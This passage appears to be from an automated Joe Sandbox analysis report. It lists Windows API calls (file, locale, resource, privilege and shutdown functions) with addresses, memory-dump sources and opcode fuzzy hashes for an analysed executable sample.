                                                                                  • Opcode Fuzzy Hash: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                                  • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                                  APIs
                                                                                  • SetEndOfFile.KERNEL32(?,020E8000,0040AA59,00000000), ref: 004076B3
                                                                                    • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020D03AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLast
                                                                                  • String ID:
                                                                                  • API String ID: 734332943-0
                                                                                  • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                  • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                                  • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                  • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                  • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                                  • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                  • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                  • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                                  • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                  • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                                  APIs
                                                                                  • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CharPrev
                                                                                  • String ID:
                                                                                  • API String ID: 122130370-0
                                                                                  • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                  • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                                  • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                  • Instruction Fuzzy Hash:
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                  • Instruction ID: 1e7236936b067224bcb0a7c190bcfb18a105a15b1652d3161176e1d0ad605fa4
                                                                                  • Opcode Fuzzy Hash: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                  • Instruction Fuzzy Hash: 43116371A042059BDB00EF19C881B5B7794AF44359F05807AF958AB2C6DB38E800CBAA
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle
                                                                                  • String ID:
                                                                                  • API String ID: 2962429428-0
                                                                                  • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                  • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                                  • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                  • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                                  APIs
                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 1263568516-0
                                                                                  • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                  • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                                  • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                  • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040949D
                                                                                  • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004094A2
                                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                  • String ID: SeShutdownPrivilege
                                                                                  • API String ID: 107509674-3733053543
                                                                                  • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                  • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                                  • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                  • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                                  APIs
                                                                                  • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409C3E
                                                                                  • SizeofResource.KERNEL32(00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 00409C51
                                                                                  • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000), ref: 00409C63
                                                                                  • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92), ref: 00409C74
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                  • String ID:
                                                                                  • API String ID: 3473537107-0
                                                                                  • Opcode ID: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                  • Instruction ID: 5c2a5118689e511edc0a9dde7e1b9e77d0383d271af581b44440e1e73e890ea9
                                                                                  • Opcode Fuzzy Hash: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                  • Instruction Fuzzy Hash: B0E07E80B8874726FA6576FB08C7B6B008C4BA570EF00003BB700792C3DDBC8C04462E
                                                                                  APIs
                                                                                  • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID:
                                                                                  • API String ID: 2299586839-0
                                                                                  • Opcode ID: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                  • Instruction ID: 1db3d1c1bb6fab5f91442dea8a08a829cd161d84d3a7e1f0c2fe21aaaafd944f
                                                                                  • Opcode Fuzzy Hash: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                  • Instruction Fuzzy Hash: 9ED02EA230E2006AE210808B2C84EBB4A9CCEC53A0F00007FF648C3242D2208C029B76
                                                                                  APIs
                                                                                  • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: SystemTime
                                                                                  • String ID:
                                                                                  • API String ID: 2656138-0
                                                                                  • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                  • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                                  • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                  • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                                  APIs
                                                                                  • GetVersionExA.KERNEL32(?,004065F0,00000000,004065FE,?,?,?,?,?,0040A622), ref: 00405D02
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Version
                                                                                  • String ID:
                                                                                  • API String ID: 1889659487-0
                                                                                  • Opcode ID: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                  • Instruction ID: 4c33b40dd65743d8d98a5ffd827b1eb297e5dd4f71424004bfe2d5ab9b26ea54
                                                                                  • Opcode Fuzzy Hash: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                  • Instruction Fuzzy Hash: 00C0126040070186D7109B31DC02B1672D4AB44310F4405396DA4963C2E73C80018A6E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                  • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                                  • Opcode Fuzzy Hash: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                  • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 0040704D
                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 004070A1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressCloseHandleModuleProc
                                                                                  • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                  • API String ID: 4190037839-2401316094
                                                                                  • Opcode ID: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                  • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                  • Opcode Fuzzy Hash: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                  • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                  • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                  • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                  • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                  • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                  • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                  • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                  • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                  • String ID:
                                                                                  • API String ID: 1694776339-0
                                                                                  • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                  • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                  • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                  • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                  APIs
                                                                                  • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                  • LocalFree.KERNEL32(00743C10,00000000,00401AB4), ref: 00401A1B
                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,00743C10,00000000,00401AB4), ref: 00401A3A
                                                                                  • LocalFree.KERNEL32(00744C10,?,00000000,00008000,00743C10,00000000,00401AB4), ref: 00401A79
                                                                                  • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                  • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                  • String ID: 4Rt$DRt
                                                                                  • API String ID: 3782394904-192030282
                                                                                  • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                  • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                                  • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                  • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                                  APIs
                                                                                  • GetSystemDefaultLCID.KERNEL32(00000000,0040560C,?,?,?,?,00000000,00000000,00000000,?,004065EB,00000000,004065FE), ref: 004053DE
                                                                                    • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                    • Part of subcall function 00405258: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLocale$DefaultSystem
                                                                                  • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                  • API String ID: 1044490935-665933166
                                                                                  • Opcode ID: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                  • Instruction ID: cc137df54ae1fcbb63b87987e69a719e9c27c4b31815d0debc5c9b1d2781c89a
                                                                                  • Opcode Fuzzy Hash: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                  • Instruction Fuzzy Hash: F8515374B00548ABDB00EBA59891A5F7769DB88304F50D5BBB515BB3C6CA3DCA058F1C
                                                                                  APIs
                                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                  • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExitMessageProcess
                                                                                  • String ID: Error$Runtime error at 00000000$9@
                                                                                  • API String ID: 1220098344-1503883590
                                                                                  • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                  • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                  • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                  • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                  • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                  • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$AllocString
                                                                                  • String ID:
                                                                                  • API String ID: 262959230-0
                                                                                  • Opcode ID: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
